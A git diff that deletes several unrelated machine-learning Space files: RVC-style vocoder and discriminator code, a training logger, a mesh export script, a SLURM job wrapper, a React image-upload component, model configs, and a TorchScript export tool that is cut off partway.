super(Generator, self).__init__() - self.num_kernels = len(resblock_kernel_sizes) - self.num_upsamples = len(upsample_rates) - self.conv_pre = Conv1d( - initial_channel, upsample_initial_channel, 7, 1, padding=3 - ) - resblock = modules.ResBlock1 if resblock == "1" else modules.ResBlock2 - - self.ups = nn.ModuleList() - for i, (u, k) in enumerate(zip(upsample_rates, upsample_kernel_sizes)): - self.ups.append( - weight_norm( - ConvTranspose1d( - upsample_initial_channel // (2**i), - upsample_initial_channel // (2 ** (i + 1)), - k, - u, - padding=(k - u) // 2, - ) - ) - ) - - self.resblocks = nn.ModuleList() - for i in range(len(self.ups)): - ch = upsample_initial_channel // (2 ** (i + 1)) - for j, (k, d) in enumerate( - zip(resblock_kernel_sizes, resblock_dilation_sizes) - ): - self.resblocks.append(resblock(ch, k, d)) - - self.conv_post = Conv1d(ch, 1, 7, 1, padding=3, bias=False) - self.ups.apply(init_weights) - - if gin_channels != 0: - self.cond = nn.Conv1d(gin_channels, upsample_initial_channel, 1) - - def forward(self, x, g=None): - x = self.conv_pre(x) - if g is not None: - x = x + self.cond(g) - - for i in range(self.num_upsamples): - x = F.leaky_relu(x, modules.LRELU_SLOPE) - x = self.ups[i](x) - xs = None - for j in range(self.num_kernels): - if xs is None: - xs = self.resblocks[i * self.num_kernels + j](x) - else: - xs += self.resblocks[i * self.num_kernels + j](x) - x = xs / self.num_kernels - x = F.leaky_relu(x) - x = self.conv_post(x) - x = torch.tanh(x) - - return x - - def remove_weight_norm(self): - for l in self.ups: - remove_weight_norm(l) - for l in self.resblocks: - l.remove_weight_norm() - - -class SineGen(torch.nn.Module): - """Definition of sine generator - SineGen(samp_rate, harmonic_num = 0, - sine_amp = 0.1, noise_std = 0.003, - voiced_threshold = 0, - flag_for_pulse=False) - samp_rate: sampling rate in Hz - harmonic_num: number of harmonic overtones (default 0) - sine_amp: amplitude of sine-wavefrom (default 0.1) - noise_std: std of Gaussian noise (default 0.003) - voiced_thoreshold: F0 threshold for U/V classification (default 0) - flag_for_pulse: this SinGen is used inside PulseGen (default False) - Note: when flag_for_pulse is True, the first time step of a voiced - segment is always sin(np.pi) or cos(0) - """ - - def __init__( - self, - samp_rate, - harmonic_num=0, - sine_amp=0.1, - noise_std=0.003, - voiced_threshold=0, - flag_for_pulse=False, - ): - super(SineGen, self).__init__() - self.sine_amp = sine_amp - self.noise_std = noise_std - self.harmonic_num = harmonic_num - self.dim = self.harmonic_num + 1 - self.sampling_rate = samp_rate - self.voiced_threshold = voiced_threshold - - def _f02uv(self, f0): - # generate uv signal - uv = torch.ones_like(f0) - uv = uv * (f0 > self.voiced_threshold) - return uv - - def forward(self, f0, upp): - """sine_tensor, uv = forward(f0) - input F0: tensor(batchsize=1, length, dim=1) - f0 for unvoiced steps should be 0 - output sine_tensor: tensor(batchsize=1, length, dim) - output uv: tensor(batchsize=1, length, 1) - """ - with torch.no_grad(): - f0 = f0[:, None].transpose(1, 2) - f0_buf = torch.zeros(f0.shape[0], f0.shape[1], self.dim, device=f0.device) - # fundamental component - f0_buf[:, :, 0] = f0[:, :, 0] - for idx in np.arange(self.harmonic_num): - f0_buf[:, :, idx + 1] = f0_buf[:, :, 0] * ( - idx + 2 - ) # idx + 2: the (idx+1)-th overtone, (idx+2)-th harmonic - rad_values = (f0_buf / self.sampling_rate) % 1 ###%1意味着n_har的乘积无法后处理优化 - rand_ini = torch.rand( - f0_buf.shape[0], f0_buf.shape[2], device=f0_buf.device - ) - rand_ini[:, 0] = 0 - rad_values[:, 0, :] = rad_values[:, 0, :] + rand_ini - tmp_over_one = torch.cumsum(rad_values, 1) # % 1 #####%1意味着后面的cumsum无法再优化 - tmp_over_one *= upp - tmp_over_one = F.interpolate( - tmp_over_one.transpose(2, 1), - scale_factor=upp, - mode="linear", - align_corners=True, - ).transpose(2, 1) - rad_values = F.interpolate( - rad_values.transpose(2, 1), scale_factor=upp, mode="nearest" - ).transpose( - 2, 1 - ) ####### - tmp_over_one %= 1 - tmp_over_one_idx = (tmp_over_one[:, 1:, :] - tmp_over_one[:, :-1, :]) < 0 - cumsum_shift = torch.zeros_like(rad_values) - cumsum_shift[:, 1:, :] = tmp_over_one_idx * -1.0 - sine_waves = torch.sin( - torch.cumsum(rad_values + cumsum_shift, dim=1) * 2 * np.pi - ) - sine_waves = sine_waves * self.sine_amp - uv = self._f02uv(f0) - uv = F.interpolate( - uv.transpose(2, 1), scale_factor=upp, mode="nearest" - ).transpose(2, 1) - noise_amp = uv * self.noise_std + (1 - uv) * self.sine_amp / 3 - noise = noise_amp * torch.randn_like(sine_waves) - sine_waves = sine_waves * uv + noise - return sine_waves, uv, noise - - -class SourceModuleHnNSF(torch.nn.Module): - """SourceModule for hn-nsf - SourceModule(sampling_rate, harmonic_num=0, sine_amp=0.1, - add_noise_std=0.003, voiced_threshod=0) - sampling_rate: sampling_rate in Hz - harmonic_num: number of harmonic above F0 (default: 0) - sine_amp: amplitude of sine source signal (default: 0.1) - add_noise_std: std of additive Gaussian noise (default: 0.003) - note that amplitude of noise in unvoiced is decided - by sine_amp - voiced_threshold: threhold to set U/V given F0 (default: 0) - Sine_source, noise_source = SourceModuleHnNSF(F0_sampled) - F0_sampled (batchsize, length, 1) - Sine_source (batchsize, length, 1) - noise_source (batchsize, length 1) - uv (batchsize, length, 1) - """ - - def __init__( - self, - sampling_rate, - harmonic_num=0, - sine_amp=0.1, - add_noise_std=0.003, - voiced_threshod=0, - is_half=True, - ): - super(SourceModuleHnNSF, self).__init__() - - self.sine_amp = sine_amp - self.noise_std = add_noise_std - self.is_half = is_half - # to produce sine waveforms - self.l_sin_gen = SineGen( - sampling_rate, harmonic_num, sine_amp, add_noise_std, voiced_threshod - ) - - # to merge source harmonics into a single excitation - self.l_linear = torch.nn.Linear(harmonic_num + 1, 1) - self.l_tanh = torch.nn.Tanh() - - def forward(self, x, upp=None): - sine_wavs, uv, _ = self.l_sin_gen(x, upp) - if self.is_half: - sine_wavs = sine_wavs.half() - sine_merge = self.l_tanh(self.l_linear(sine_wavs)) - return sine_merge, None, None # noise, uv - - -class GeneratorNSF(torch.nn.Module): - def __init__( - self, - initial_channel, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - gin_channels, - sr, - is_half=False, - ): - super(GeneratorNSF, self).__init__() - self.num_kernels = len(resblock_kernel_sizes) - self.num_upsamples = len(upsample_rates) - - self.f0_upsamp = torch.nn.Upsample(scale_factor=np.prod(upsample_rates)) - self.m_source = SourceModuleHnNSF( - sampling_rate=sr, harmonic_num=0, is_half=is_half - ) - self.noise_convs = nn.ModuleList() - self.conv_pre = Conv1d( - initial_channel, upsample_initial_channel, 7, 1, padding=3 - ) - resblock = modules.ResBlock1 if resblock == "1" else modules.ResBlock2 - - self.ups = nn.ModuleList() - for i, (u, k) in enumerate(zip(upsample_rates, upsample_kernel_sizes)): - c_cur = upsample_initial_channel // (2 ** (i + 1)) - self.ups.append( - weight_norm( - ConvTranspose1d( - upsample_initial_channel // (2**i), - upsample_initial_channel // (2 ** (i + 1)), - k, - u, - padding=(k - u) // 2, - ) - ) - ) - if i + 1 < len(upsample_rates): - stride_f0 = np.prod(upsample_rates[i + 1 :]) - self.noise_convs.append( - Conv1d( - 1, - c_cur, - kernel_size=stride_f0 * 2, - stride=stride_f0, - padding=stride_f0 // 2, - ) - ) - else: - self.noise_convs.append(Conv1d(1, c_cur, kernel_size=1)) - - self.resblocks = nn.ModuleList() - for i in range(len(self.ups)): - ch = upsample_initial_channel // (2 ** (i + 1)) - for j, (k, d) in enumerate( - zip(resblock_kernel_sizes, resblock_dilation_sizes) - ): - self.resblocks.append(resblock(ch, k, d)) - - self.conv_post = Conv1d(ch, 1, 7, 1, padding=3, bias=False) - self.ups.apply(init_weights) - - if gin_channels != 0: - self.cond = nn.Conv1d(gin_channels, upsample_initial_channel, 1) - - self.upp = np.prod(upsample_rates) - - def forward(self, x, f0, g=None): - har_source, noi_source, uv = self.m_source(f0, self.upp) - har_source = har_source.transpose(1, 2) - x = self.conv_pre(x) - if g is not None: - x = x + self.cond(g) - - for i in range(self.num_upsamples): - x = F.leaky_relu(x, modules.LRELU_SLOPE) - x = self.ups[i](x) - x_source = self.noise_convs[i](har_source) - x = x + x_source - xs = None - for j in range(self.num_kernels): - if xs is None: - xs = self.resblocks[i * self.num_kernels + j](x) - else: - xs += self.resblocks[i * self.num_kernels + j](x) - x = xs / self.num_kernels - x = F.leaky_relu(x) - x = self.conv_post(x) - x = torch.tanh(x) - return x - - def remove_weight_norm(self): - for l in self.ups: - remove_weight_norm(l) - for l in self.resblocks: - l.remove_weight_norm() - - -sr2sr = { - "32k": 32000, - "40k": 40000, - "48k": 48000, -} - - -class SynthesizerTrnMsNSFsidM(nn.Module): - def __init__( - self, - spec_channels, - segment_size, - inter_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - spk_embed_dim, - gin_channels, - sr, - version, - **kwargs - ): - super().__init__() - if type(sr) == type("strr"): - sr = sr2sr[sr] - self.spec_channels = spec_channels - self.inter_channels = inter_channels - self.hidden_channels = hidden_channels - self.filter_channels = filter_channels - self.n_heads = n_heads - self.n_layers = n_layers - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.resblock = resblock - self.resblock_kernel_sizes = resblock_kernel_sizes - self.resblock_dilation_sizes = resblock_dilation_sizes - self.upsample_rates = upsample_rates - self.upsample_initial_channel = upsample_initial_channel - self.upsample_kernel_sizes = upsample_kernel_sizes - self.segment_size = segment_size - self.gin_channels = gin_channels - # self.hop_length = hop_length# - self.spk_embed_dim = spk_embed_dim - if version == "v1": - self.enc_p = TextEncoder256( - inter_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - ) - else: - self.enc_p = TextEncoder768( - inter_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - ) - self.dec = GeneratorNSF( - inter_channels, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - gin_channels=gin_channels, - sr=sr, - is_half=kwargs["is_half"], - ) - self.enc_q = PosteriorEncoder( - spec_channels, - inter_channels, - hidden_channels, - 5, - 1, - 16, - gin_channels=gin_channels, - ) - self.flow = ResidualCouplingBlock( - inter_channels, hidden_channels, 5, 1, 3, gin_channels=gin_channels - ) - self.emb_g = nn.Embedding(self.spk_embed_dim, gin_channels) - self.speaker_map = None - print("gin_channels:", gin_channels, "self.spk_embed_dim:", self.spk_embed_dim) - - def remove_weight_norm(self): - self.dec.remove_weight_norm() - self.flow.remove_weight_norm() - self.enc_q.remove_weight_norm() - - def construct_spkmixmap(self, n_speaker): - self.speaker_map = torch.zeros((n_speaker, 1, 1, self.gin_channels)) - for i in range(n_speaker): - self.speaker_map[i] = self.emb_g(torch.LongTensor([[i]])) - self.speaker_map = self.speaker_map.unsqueeze(0) - - def forward(self, phone, phone_lengths, pitch, nsff0, g, rnd, max_len=None): - if self.speaker_map is not None: # [N, S] * [S, B, 1, H] - g = g.reshape((g.shape[0], g.shape[1], 1, 1, 1)) # [N, S, B, 1, 1] - g = g * self.speaker_map # [N, S, B, 1, H] - g = torch.sum(g, dim=1) # [N, 1, B, 1, H] - g = g.transpose(0, -1).transpose(0, -2).squeeze(0) # [B, H, N] - else: - g = g.unsqueeze(0) - g = self.emb_g(g).transpose(1, 2) - - m_p, logs_p, x_mask = self.enc_p(phone, pitch, phone_lengths) - z_p = (m_p + torch.exp(logs_p) * rnd) * x_mask - z = self.flow(z_p, x_mask, g=g, reverse=True) - o = self.dec((z * x_mask)[:, :, :max_len], nsff0, g=g) - return o - - -class MultiPeriodDiscriminator(torch.nn.Module): - def __init__(self, use_spectral_norm=False): - super(MultiPeriodDiscriminator, self).__init__() - periods = [2, 3, 5, 7, 11, 17] - # periods = [3, 5, 7, 11, 17, 23, 37] - - discs = [DiscriminatorS(use_spectral_norm=use_spectral_norm)] - discs = discs + [ - DiscriminatorP(i, use_spectral_norm=use_spectral_norm) for i in periods - ] - self.discriminators = nn.ModuleList(discs) - - def forward(self, y, y_hat): - y_d_rs = [] # - y_d_gs = [] - fmap_rs = [] - fmap_gs = [] - for i, d in enumerate(self.discriminators): - y_d_r, fmap_r = d(y) - y_d_g, fmap_g = d(y_hat) - # for j in range(len(fmap_r)): - # print(i,j,y.shape,y_hat.shape,fmap_r[j].shape,fmap_g[j].shape) - y_d_rs.append(y_d_r) - y_d_gs.append(y_d_g) - fmap_rs.append(fmap_r) - fmap_gs.append(fmap_g) - - return y_d_rs, y_d_gs, fmap_rs, fmap_gs - - -class MultiPeriodDiscriminatorV2(torch.nn.Module): - def __init__(self, use_spectral_norm=False): - super(MultiPeriodDiscriminatorV2, self).__init__() - # periods = [2, 3, 5, 7, 11, 17] - periods = [2, 3, 5, 7, 11, 17, 23, 37] - - discs = [DiscriminatorS(use_spectral_norm=use_spectral_norm)] - discs = discs + [ - DiscriminatorP(i, use_spectral_norm=use_spectral_norm) for i in periods - ] - self.discriminators = nn.ModuleList(discs) - - def forward(self, y, y_hat): - y_d_rs = [] # - y_d_gs = [] - fmap_rs = [] - fmap_gs = [] - for i, d in enumerate(self.discriminators): - y_d_r, fmap_r = d(y) - y_d_g, fmap_g = d(y_hat) - # for j in range(len(fmap_r)): - # print(i,j,y.shape,y_hat.shape,fmap_r[j].shape,fmap_g[j].shape) - y_d_rs.append(y_d_r) - y_d_gs.append(y_d_g) - fmap_rs.append(fmap_r) - fmap_gs.append(fmap_g) - - return y_d_rs, y_d_gs, fmap_rs, fmap_gs - - -class DiscriminatorS(torch.nn.Module): - def __init__(self, use_spectral_norm=False): - super(DiscriminatorS, self).__init__() - norm_f = weight_norm if use_spectral_norm == False else spectral_norm - self.convs = nn.ModuleList( - [ - norm_f(Conv1d(1, 16, 15, 1, padding=7)), - norm_f(Conv1d(16, 64, 41, 4, groups=4, padding=20)), - norm_f(Conv1d(64, 256, 41, 4, groups=16, padding=20)), - norm_f(Conv1d(256, 1024, 41, 4, groups=64, padding=20)), - norm_f(Conv1d(1024, 1024, 41, 4, groups=256, padding=20)), - norm_f(Conv1d(1024, 1024, 5, 1, padding=2)), - ] - ) - self.conv_post = norm_f(Conv1d(1024, 1, 3, 1, padding=1)) - - def forward(self, x): - fmap = [] - - for l in self.convs: - x = l(x) - x = F.leaky_relu(x, modules.LRELU_SLOPE) - fmap.append(x) - x = self.conv_post(x) - fmap.append(x) - x = torch.flatten(x, 1, -1) - - return x, fmap - - -class DiscriminatorP(torch.nn.Module): - def __init__(self, period, kernel_size=5, stride=3, use_spectral_norm=False): - super(DiscriminatorP, self).__init__() - self.period = period - self.use_spectral_norm = use_spectral_norm - norm_f = weight_norm if use_spectral_norm == False else spectral_norm - self.convs = nn.ModuleList( - [ - norm_f( - Conv2d( - 1, - 32, - (kernel_size, 1), - (stride, 1), - padding=(get_padding(kernel_size, 1), 0), - ) - ), - norm_f( - Conv2d( - 32, - 128, - (kernel_size, 1), - (stride, 1), - padding=(get_padding(kernel_size, 1), 0), - ) - ), - norm_f( - Conv2d( - 128, - 512, - (kernel_size, 1), - (stride, 1), - padding=(get_padding(kernel_size, 1), 0), - ) - ), - norm_f( - Conv2d( - 512, - 1024, - (kernel_size, 1), - (stride, 1), - padding=(get_padding(kernel_size, 1), 0), - ) - ), - norm_f( - Conv2d( - 1024, - 1024, - (kernel_size, 1), - 1, - padding=(get_padding(kernel_size, 1), 0), - ) - ), - ] - ) - self.conv_post = norm_f(Conv2d(1024, 1, (3, 1), 1, padding=(1, 0))) - - def forward(self, x): - fmap = [] - - # 1d to 2d - b, c, t = x.shape - if t % self.period != 0: # pad first - n_pad = self.period - (t % self.period) - x = F.pad(x, (0, n_pad), "reflect") - t = t + n_pad - x = x.view(b, c, t // self.period, self.period) - - for l in self.convs: - x = l(x) - x = F.leaky_relu(x, modules.LRELU_SLOPE) - fmap.append(x) - x = self.conv_post(x) - fmap.append(x) - x = torch.flatten(x, 1, -1) - - return x, fmap diff --git a/spaces/FrankZxShen/so-vits-svc-models-pcr/diffusion/logger/saver.py b/spaces/FrankZxShen/so-vits-svc-models-pcr/diffusion/logger/saver.py deleted file mode 100644 index ef78b52b6bcd32106f962b731d3784d72d5f0cce..0000000000000000000000000000000000000000 --- a/spaces/FrankZxShen/so-vits-svc-models-pcr/diffusion/logger/saver.py +++ /dev/null @@ -1,150 +0,0 @@ -''' -author: wayn391@mastertones -''' - -import os -import json -import time -import yaml -import datetime -import torch -import matplotlib.pyplot as plt -from . import utils -from torch.utils.tensorboard import SummaryWriter - -class Saver(object): - def __init__( - self, - args, - initial_global_step=-1): - - self.expdir = args.env.expdir - self.sample_rate = args.data.sampling_rate - - # cold start - self.global_step = initial_global_step - self.init_time = time.time() - self.last_time = time.time() - - # makedirs - os.makedirs(self.expdir, exist_ok=True) - - # path - self.path_log_info = os.path.join(self.expdir, 'log_info.txt') - - # ckpt - os.makedirs(self.expdir, exist_ok=True) - - # writer - self.writer = SummaryWriter(os.path.join(self.expdir, 'logs')) - - # save config - path_config = os.path.join(self.expdir, 'config.yaml') - with open(path_config, "w") as out_config: - yaml.dump(dict(args), out_config) - - - def log_info(self, msg): - '''log method''' - if isinstance(msg, dict): - msg_list = [] - for k, v in msg.items(): - tmp_str = '' - if isinstance(v, int): - tmp_str = '{}: {:,}'.format(k, v) - else: - tmp_str = '{}: {}'.format(k, v) - - msg_list.append(tmp_str) - msg_str = '\n'.join(msg_list) - else: - msg_str = msg - - # dsplay - print(msg_str) - - # save - with open(self.path_log_info, 'a') as fp: - fp.write(msg_str+'\n') - - def log_value(self, dict): - for k, v in dict.items(): - self.writer.add_scalar(k, v, self.global_step) - - def log_spec(self, name, spec, spec_out, vmin=-14, vmax=3.5): - spec_cat = torch.cat([(spec_out - spec).abs() + vmin, spec, spec_out], -1) - spec = spec_cat[0] - if isinstance(spec, torch.Tensor): - spec = spec.cpu().numpy() - fig = plt.figure(figsize=(12, 9)) - plt.pcolor(spec.T, vmin=vmin, vmax=vmax) - plt.tight_layout() - self.writer.add_figure(name, fig, self.global_step) - - def log_audio(self, dict): - for k, v in dict.items(): - self.writer.add_audio(k, v, global_step=self.global_step, sample_rate=self.sample_rate) - - def get_interval_time(self, update=True): - cur_time = time.time() - time_interval = cur_time - self.last_time - if update: - self.last_time = cur_time - return time_interval - - def get_total_time(self, to_str=True): - total_time = time.time() - self.init_time - if to_str: - total_time = str(datetime.timedelta( - seconds=total_time))[:-5] - return total_time - - def save_model( - self, - model, - optimizer, - name='model', - postfix='', - to_json=False): - # path - if postfix: - postfix = '_' + postfix - path_pt = os.path.join( - self.expdir , name+postfix+'.pt') - - # check - print(' [*] model checkpoint saved: {}'.format(path_pt)) - - # save - if optimizer is not None: - torch.save({ - 'global_step': self.global_step, - 'model': model.state_dict(), - 'optimizer': optimizer.state_dict()}, path_pt) - else: - torch.save({ - 'global_step': self.global_step, - 'model': model.state_dict()}, path_pt) - - # to json - if to_json: - path_json = os.path.join( - self.expdir , name+'.json') - utils.to_json(path_params, path_json) - - def delete_model(self, name='model', postfix=''): - # path - if postfix: - postfix = '_' + postfix - path_pt = os.path.join( - self.expdir , name+postfix+'.pt') - - # delete - if os.path.exists(path_pt): - os.remove(path_pt) - print(' [*] model checkpoint deleted: {}'.format(path_pt)) - - def global_step_increment(self): - self.global_step += 1 - - diff --git a/spaces/Gen-Sim/Gen-Sim/misc/generate_primitive_mesh.py b/spaces/Gen-Sim/Gen-Sim/misc/generate_primitive_mesh.py deleted file mode 100644 index 3032679b8ef6192ac25c24528bf4f98ea2c2a2bd..0000000000000000000000000000000000000000 --- a/spaces/Gen-Sim/Gen-Sim/misc/generate_primitive_mesh.py +++ /dev/null @@ -1,15 +0,0 @@ -import numpy as np -import trimesh - -# generate unit length mesh to replace primitives - -box = trimesh.creation.box(extents=[1, 1, 1]) -trimesh.exchange.export.export_mesh(box, "box.obj") - - -cylinder = trimesh.creation.cylinder(radius=1, height=1) -trimesh.exchange.export.export_mesh(cylinder, "cylinder.obj") - - -sphere = trimesh.creation.icosphere() -trimesh.exchange.export.export_mesh(sphere, "sphere.obj") diff --git a/spaces/Gen-Sim/Gen-Sim/scripts/supercloud/run_job_script.sh b/spaces/Gen-Sim/Gen-Sim/scripts/supercloud/run_job_script.sh deleted file mode 100644 index 0c66194297d55f1130ea0fb9ff487790591d3262..0000000000000000000000000000000000000000 --- a/spaces/Gen-Sim/Gen-Sim/scripts/supercloud/run_job_script.sh +++ /dev/null @@ -1,7 +0,0 @@ -#!/bin/bash -#SBATCH -c 10 -#SBATCH -n 1 -#SBATCH -o logs/%j.out -#SBATCH --exclusive - -eval $CMD \ No newline at end of file diff --git a/spaces/GeorgeOrville/bingo/src/components/chat-image.tsx b/spaces/GeorgeOrville/bingo/src/components/chat-image.tsx deleted file mode 100644 index 05ecc9771eada27a0f2d160bb01cba170d37bb09..0000000000000000000000000000000000000000 --- a/spaces/GeorgeOrville/bingo/src/components/chat-image.tsx +++ /dev/null @@ -1,170 +0,0 @@ -import { - useEffect, - useState, - useCallback, - ChangeEvent, - ClipboardEvent, - MouseEventHandler, - FormEvent, - useRef -} from "react" -import Image from 'next/image' -import PasteIcon from '@/assets/images/paste.svg' -import UploadIcon from '@/assets/images/upload.svg' -import CameraIcon from '@/assets/images/camera.svg' -import { useBing } from '@/lib/hooks/use-bing' -import { cn } from '@/lib/utils' - -interface ChatImageProps extends Pick, 'uploadImage'> {} - -const preventDefault: MouseEventHandler = (event) => { - event.nativeEvent.stopImmediatePropagation() -} - -const toBase64 = (file: File): Promise => new Promise((resolve, reject) => { - const reader = new FileReader() - reader.readAsDataURL(file) - reader.onload = () => resolve(reader.result as string) - reader.onerror = reject -}) - -export function ChatImage({ children, uploadImage }: React.PropsWithChildren) { - const videoRef = useRef(null) - const canvasRef = useRef(null) - const mediaStream = useRef() - const [panel, setPanel] = useState('none') - - const upload = useCallback((url: string) => { - if (url) { - uploadImage(url) - } - setPanel('none') - }, [panel]) - - const onUpload = useCallback(async (event: ChangeEvent) => { - const file = event.target.files?.[0] - if (file) { - const fileDataUrl = await toBase64(file) - if (fileDataUrl) { - upload(fileDataUrl) - } - } - }, []) - - const onPaste = useCallback((event: ClipboardEvent) => { - const pasteUrl = event.clipboardData.getData('text') ?? '' - upload(pasteUrl) - }, []) - - const onEnter = useCallback((event: FormEvent) => { - event.preventDefault() - event.stopPropagation() - // @ts-ignore - const inputUrl = event.target.elements.image.value - if (inputUrl) { - upload(inputUrl) - } - }, []) - - const openVideo: MouseEventHandler = async (event) => { - event.stopPropagation() - setPanel('camera-mode') - } - - const onCapture = () => { - if (canvasRef.current && videoRef.current) { - const canvas = canvasRef.current - canvas.width = videoRef.current!.videoWidth - canvas.height = videoRef.current!.videoHeight - canvas.getContext('2d')?.drawImage(videoRef.current, 0, 0, canvas.width, canvas.height) - const cameraUrl = canvas.toDataURL('image/jpeg') - upload(cameraUrl) - } - } - - useEffect(() => { - const handleBlur = () => { - if (panel !== 'none') { - setPanel('none') - } - } - document.addEventListener('click', handleBlur) - return () => { - document.removeEventListener('click', handleBlur) - } - }, [panel]) - - useEffect(() => { - if (panel === 'camera-mode') { - navigator.mediaDevices.getUserMedia({ video: true, audio: false }) - .then(videoStream => { - mediaStream.current = videoStream - if (videoRef.current) { - videoRef.current.srcObject = videoStream - } - }) - } else { - if (mediaStream.current) { - mediaStream.current.getTracks().forEach(function(track) { - track.stop() - }) - mediaStream.current = undefined - } - } - }, [panel]) - - return ( -
      -
      panel === 'none' ? setPanel('normal') : setPanel('none')}>{children}
      -
      -
      -
      -

      添加图像

      -
      -
      - paste -
      - e.stopPropagation()} - /> -
      -
      -
      - - -
      -
      - {panel === 'camera-mode' &&
      -
      -
      -
      -
      -
      -
      -
      } -
      -
      - ) -} diff --git a/spaces/Gradio-Blocks/uniformer_image_detection/configs/dcn/mask_rcnn_r50_fpn_dconv_c3-c5_1x_coco.py b/spaces/Gradio-Blocks/uniformer_image_detection/configs/dcn/mask_rcnn_r50_fpn_dconv_c3-c5_1x_coco.py deleted file mode 100644 index ababe58dc3fdfbbc6c366f48271db31bf6e2e9e2..0000000000000000000000000000000000000000 --- a/spaces/Gradio-Blocks/uniformer_image_detection/configs/dcn/mask_rcnn_r50_fpn_dconv_c3-c5_1x_coco.py +++ /dev/null @@ -1,5 +0,0 @@ -_base_ = '../mask_rcnn/mask_rcnn_r50_fpn_1x_coco.py' -model = dict( - backbone=dict( - dcn=dict(type='DCN', deform_groups=1, fallback_on_stride=False), - stage_with_dcn=(False, True, True, True))) diff --git a/spaces/Gradio-Blocks/uniformer_image_detection/configs/faster_rcnn/faster_rcnn_r50_fpn_iou_1x_coco.py b/spaces/Gradio-Blocks/uniformer_image_detection/configs/faster_rcnn/faster_rcnn_r50_fpn_iou_1x_coco.py deleted file mode 100644 index ddf663e4f0e1525490a493674b32b3dc4c781bb2..0000000000000000000000000000000000000000 --- a/spaces/Gradio-Blocks/uniformer_image_detection/configs/faster_rcnn/faster_rcnn_r50_fpn_iou_1x_coco.py +++ /dev/null @@ -1,6 +0,0 @@ -_base_ = './faster_rcnn_r50_fpn_1x_coco.py' -model = dict( - roi_head=dict( - bbox_head=dict( - reg_decoded_bbox=True, - loss_bbox=dict(type='IoULoss', loss_weight=10.0)))) diff --git a/spaces/Gradio-Blocks/uniformer_image_segmentation/configs/danet/danet_r101-d8_769x769_80k_cityscapes.py b/spaces/Gradio-Blocks/uniformer_image_segmentation/configs/danet/danet_r101-d8_769x769_80k_cityscapes.py deleted file mode 100644 index 70f9b31966128e8d9ec37859f57a7edfd8e6d1b2..0000000000000000000000000000000000000000 --- a/spaces/Gradio-Blocks/uniformer_image_segmentation/configs/danet/danet_r101-d8_769x769_80k_cityscapes.py +++ /dev/null @@ -1,2 +0,0 @@ -_base_ = './danet_r50-d8_769x769_80k_cityscapes.py' -model = dict(pretrained='open-mmlab://resnet101_v1c', backbone=dict(depth=101)) diff --git a/spaces/Gradio-Blocks/uniformer_image_segmentation/tools/pytorch2torchscript.py b/spaces/Gradio-Blocks/uniformer_image_segmentation/tools/pytorch2torchscript.py deleted file mode 100644 index 206c4bb457ece3901fbd536db1c666290f217aa4..0000000000000000000000000000000000000000 --- a/spaces/Gradio-Blocks/uniformer_image_segmentation/tools/pytorch2torchscript.py +++ /dev/null @@ -1,184 +0,0 @@ -import argparse - -import mmcv -import numpy as np -import torch -import torch._C -import torch.serialization -from mmcv.runner import load_checkpoint -from torch import nn - -from mmseg.models import build_segmentor - -torch.manual_seed(3) - - -def digit_version(version_str): - digit_version = [] - for x in version_str.split('.'): - if x.isdigit(): - digit_version.append(int(x)) - elif x.find('rc') != -1: - patch_version = x.split('rc') - digit_version.append(int(patch_version[0]) - 1) - digit_version.append(int(patch_version[1])) - return digit_version - - -def check_torch_version(): - torch_minimum_version = '1.8.0' - torch_version = digit_version(torch.__version__) - - assert (torch_version >= digit_version(torch_minimum_version)), \ - f'Torch=={torch.__version__} is not support for converting to ' \ - f'torchscript. Please install pytorch>={torch_minimum_version}.' - - -def _convert_batchnorm(module): - module_output = module - if isinstance(module, torch.nn.SyncBatchNorm): - module_output = torch.nn.BatchNorm2d(module.num_features, module.eps, - module.momentum, module.affine, - module.track_running_stats) - if module.affine: - module_output.weight.data = module.weight.data.clone().detach() - module_output.bias.data = module.bias.data.clone().detach() - # keep requires_grad unchanged - module_output.weight.requires_grad = module.weight.requires_grad - module_output.bias.requires_grad = module.bias.requires_grad - module_output.running_mean = module.running_mean - module_output.running_var = module.running_var - module_output.num_batches_tracked = module.num_batches_tracked - for name, child in module.named_children(): - module_output.add_module(name, _convert_batchnorm(child)) - del module - return module_output - - -def _demo_mm_inputs(input_shape, num_classes): - """Create a superset of inputs needed to run test or train batches. - - Args: - input_shape (tuple): - input batch dimensions - num_classes (int): - number of semantic classes - """ - (N, C, H, W) = input_shape - rng = np.random.RandomState(0) - imgs = rng.rand(*input_shape) - segs = rng.randint( - low=0, high=num_classes - 1, size=(N, 1, H, W)).astype(np.uint8) - img_metas = [{ - 'img_shape': (H, W, C), - 'ori_shape': (H, W, C), - 'pad_shape': (H, W, C), - 'filename': '.png', - 'scale_factor': 1.0, - 'flip': False, - } for _ in range(N)] - mm_inputs = { - 'imgs': torch.FloatTensor(imgs).requires_grad_(True), - 'img_metas': img_metas, - 'gt_semantic_seg': torch.LongTensor(segs) - } - return mm_inputs - - -def pytorch2libtorch(model, - input_shape, - show=False, - output_file='tmp.pt', - verify=False): - """Export Pytorch model to TorchScript model and verify the outputs are - same between Pytorch and TorchScript. - - Args: - model (nn.Module): Pytorch model we want to export. - input_shape (tuple): Use this input shape to construct - the corresponding dummy input and execute the model. - show (bool): Whether print the computation graph. Default: False. - output_file (string): The path to where we store the - output TorchScript model. Default: `tmp.pt`. - verify (bool): Whether compare the outputs between - Pytorch and TorchScript. Default: False. - """ - if isinstance(model.decode_head, nn.ModuleList): - num_classes = model.decode_head[-1].num_classes - else: - num_classes = model.decode_head.num_classes - - mm_inputs = _demo_mm_inputs(input_shape, num_classes) - - imgs = mm_inputs.pop('imgs') - - # replace the orginal forword with forward_dummy - model.forward = model.forward_dummy - model.eval() - traced_model = torch.jit.trace( - model, - example_inputs=imgs, - check_trace=verify, - ) - - if show: - print(traced_model.graph) - - traced_model.save(output_file) - print('Successfully exported TorchScript model: {}'.format(output_file)) - - -def parse_args(): - parser = argparse.ArgumentParser( - description='Convert MMSeg to TorchScript') - parser.add_argument('config', help='test config file path') - 